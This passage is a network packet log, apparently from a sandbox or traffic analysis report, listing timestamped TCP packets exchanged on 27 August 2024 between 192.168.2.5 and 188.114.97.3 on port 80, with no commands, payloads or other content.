                              Aug 27, 2024 09:48:52.509041071 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.509625912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.509637117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.509648085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.509727001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.509814024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.510030985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.510073900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.510083914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.510134935 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.510159969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.510170937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.510268927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.511018991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.511029959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.511044025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.511117935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.511126041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.511132002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.511164904 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.511240959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.511773109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.511831045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.511846066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.511876106 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.511881113 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.511987925 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.549762011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.549906969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.549918890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.550045013 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.597335100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597357035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597367048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597414970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597501993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597577095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597588062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597604990 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.597687006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597697973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597712040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597723961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597820044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.597985029 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.598054886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.598483086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.598531008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.598541975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.598637104 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.598654985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.598666906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.598676920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.598687887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.598737955 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.598758936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.598824024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.599498034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.599509001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.599518061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.599606991 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.599617958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.599626064 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.599628925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.599638939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.599714041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.599716902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.599976063 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.600442886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.600454092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.600464106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.600557089 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.600572109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.600588083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.600598097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.600609064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.600636959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.600667000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.600688934 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.600931883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.601356983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.601403952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.601414919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.601524115 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.601528883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.601540089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.601548910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.601560116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.601811886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.638526917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.638536930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.638546944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.638557911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.638567924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.638578892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.638711929 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.638742924 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.685832024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.685843945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.685854912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.685929060 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.685951948 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.686099052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686110020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686121941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686135054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686151981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686157942 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.686167002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686178923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686187983 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.686188936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686201096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686229944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686240911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686260939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686285973 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.686316013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686321974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.686326981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686626911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686650038 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.686697960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686708927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686733961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686745882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686745882 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.686755896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.686774015 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.686867952 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.687011957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687061071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687072992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687119961 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.687216043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687226057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687236071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687247038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687258959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.687278986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687287092 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.687381029 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.687562943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687618017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687628031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687657118 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.687747002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687757969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687774897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687783003 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.687786102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687810898 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.687859058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687870026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687903881 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.687983990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.687994957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688004971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688009977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688028097 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.688143969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.688565016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688606024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688618898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688627958 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.688659906 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.688714981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688725948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688735962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688746929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688762903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.688790083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.688900948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688911915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688922882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688939095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.688944101 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.688954115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.689054966 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.690915108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.691003084 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.691006899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.691016912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.691026926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.691055059 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.691073895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.691184044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.691198111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.691220999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.691246033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.691247940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.691256046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.691272020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.691294909 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.726547003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726586103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726594925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726655960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726656914 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.726666927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726677895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726689100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726759911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.726794958 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.726824045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726834059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726845026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726855040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.726864100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.726891994 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.776447058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776462078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776472092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776612043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776623011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776633024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776643038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776765108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776777029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776787043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776896954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.776917934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.776927948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777040958 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.777096033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777105093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777112961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777123928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777189970 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.777259111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777270079 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777281046 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777292013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777302027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777312994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777338982 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.777395010 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.777405977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777417898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777477026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.777575016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777587891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777596951 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777648926 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.777731895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777743101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777751923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777762890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777774096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777827024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.777865887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777877092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777888060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777898073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777906895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.777932882 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.777987003 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.778337955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778348923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778357983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778368950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778381109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778393030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778405905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778415918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778424978 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778431892 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.778434992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778469086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778480053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778487921 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.778491974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778507948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778517008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778528929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778539896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778543949 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.778549910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778561115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778569937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778621912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.778628111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778639078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778649092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778664112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778666973 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.778676033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778686047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778697014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778707027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778717041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778727055 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778737068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778748035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778758049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778773069 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.778776884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778793097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778803110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778815031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778825045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778839111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778848886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778858900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778863907 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.778871059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778882027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778892994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778898001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778907061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778918028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778947115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778964043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778976917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778987885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.778990984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.778997898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779006958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779019117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779028893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779040098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779051065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779066086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779078007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779088974 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779099941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779103041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.779112101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779123068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779134035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779145002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.779213905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.779283047 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.779448032 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.816318035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.816330910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.816340923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.816350937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.816368103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.816378117 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.816390038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.816400051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.816677094 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.816792011 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:52.865020037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.865163088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.865174055 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:52.865185022 CEST8061383188.114.97.3192.168.2.5
